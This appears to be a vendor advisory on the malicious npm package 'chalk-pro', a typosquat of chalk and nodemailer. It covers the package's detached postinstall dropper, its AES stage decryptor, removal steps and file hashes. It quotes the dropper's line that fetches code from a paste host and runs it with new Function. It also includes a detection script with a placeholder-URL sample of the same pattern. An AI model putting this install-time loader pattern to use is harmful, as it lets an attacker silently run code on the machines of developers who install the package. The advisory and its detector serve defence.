Malicious package

chalk-pro (npm)

Malicious code in chalk-pro (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-5711
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall chalk-pro

What this malware does

Package is published as 'chalk-pro' (homepage chalk-pro.com) but its main entry is a verbatim copy of nodemailer's API — a typosquat impersonating both chalk and nodemailer, with 'Andris Reinman' (the real nodemailer author) listed as author. The package.json postinstall hook runs node lib/utils/index.js, which uses child_process.spawn(process.execPath, [filePath], { detached: true, stdio: ['ignore','ignore','ignore'] }) followed by child.unref() to launch lib/utils/smtp-connection/index.js as a detached, fully-silenced child so npm install returns immediately while the dropper continues in the background. The dropper executes require('axios').get('https://www.jsonkeeper.com/b/TOAAK').then(r => new Function('require', r.data.cookie)(require)) — fetching attacker-controlled JavaScript from a mutable paste host and evaluating it with new Function at install time, with full access to require. A second file (lib/utils/smtp-connection/parse.js) provides AES-256-CBC decryption with a hardcoded key and IV, positioned to decrypt follow-up stages delivered as hex. This is a classic install-time dropper: typosquat lure + detached/silenced postinstall + remote eval from a mutable third-party paste + bundled second-stage decryptor.
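The install-time pattern described above can be triaged statically before a package is ever installed. The following is an added example, not code from the advisory or from the package: `auditPackage`, `RULES`, the verdict labels and the `SAMPLE` contents (including its placeholder URL) are constructed for illustration, and the rules are heuristics that will also match some legitimate packages.

```javascript
// Added example: static triage of an unpacked npm package, given as a
// { relativePath: fileContents } map. All names and the sample are constructed.
const LIFECYCLE = ['preinstall', 'install', 'postinstall'];
const RULES = [
  // spawn(..., { detached: true }) plus unref(): child outlives npm install
  { id: 'detached-child', test: s => /\bspawn\s*\(/.test(s) &&
      /detached\s*:\s*true/.test(s) && /\.unref\s*\(/.test(s) },
  // new Function(...) or eval(...): runs a string as code
  { id: 'dynamic-eval', test: s => /new\s+Function\s*\(|\beval\s*\(/.test(s) },
  // HTTP client loaded or fetch() called
  { id: 'network-fetch', test: s =>
      /require\(\s*['"](axios|https?|node-fetch|got)['"]\s*\)|\bfetch\s*\(/.test(s) },
  // AES decipher created with a literal algorithm name (possible stage decryptor)
  { id: 'aes-decipher', test: s => /createDecipheriv\s*\(\s*['"]aes-/i.test(s) },
];

function auditPackage(files) {
  const scripts = JSON.parse(files['package.json']).scripts || {};
  const hooks = LIFECYCLE.filter(h => scripts[h])
    .map(h => ({ hook: h, command: scripts[h] }));
  const findings = [];
  for (const [path, src] of Object.entries(files)) {
    if (!path.endsWith('.js')) continue;
    const hits = RULES.filter(r => r.test(src)).map(r => r.id);
    if (hits.length) findings.push({ path, hits });
  }
  // Install-time verdict only: a hook plus one file that both fetches and evals.
  const remoteEval = findings.some(f =>
    f.hits.includes('dynamic-eval') && f.hits.includes('network-fetch'));
  const verdict = !hooks.length ? 'pass'
    : remoteEval ? 'block' : findings.length ? 'review' : 'pass';
  return { hooks, findings, verdict };
}

// Constructed sample shaped like the layout described above (inert strings,
// placeholder URL); it is never executed, only pattern-matched.
const SAMPLE = {
  'package.json': JSON.stringify({ name: 'example-lure',
    scripts: { postinstall: 'node lib/utils/index.js' } }),
  'lib/utils/index.js': "const { spawn } = require('child_process');\n" +
    "const c = spawn(process.execPath, [f], { detached: true, stdio: 'ignore' });\n" +
    "c.unref();\n",
  'lib/utils/smtp-connection/index.js':
    "require('axios').get('https://paste.example.invalid/b/PLACEHOLDER')\n" +
    "  .then(r => new Function('require', r.data.cookie)(require));\n",
  'lib/utils/smtp-connection/parse.js':
    "crypto.createDecipheriv('aes-256-cbc', KEY, IV);\n",
};
console.log(JSON.stringify(auditPackage(SAMPLE), null, 2));
```

To use it on a real dependency, build the map from a tarball unpacked without running scripts; a `pass` verdict only means no install hook was paired with these patterns, not that the package is safe to load.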

Malicious versions

1 flagged
7.0.4

Indicators of compromise (SHA-256)

ac66dfb6013c32d34c6ce83bdba4628b67539e81df27fe18dcf71d3de05ff8ce
d6015370f610f4d4581119093958e05171cac46e967b97725e8e3ed42dad9070

Frequently asked questions

No. chalk-pro on npm has been identified as a malicious package (version 7.0.4 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006231, IN-MAL-2026-006232

Credits

  • Amazon Inspector · finder

chalk-pro (npm) malicious package — MAL-2026-5711 | O3 Security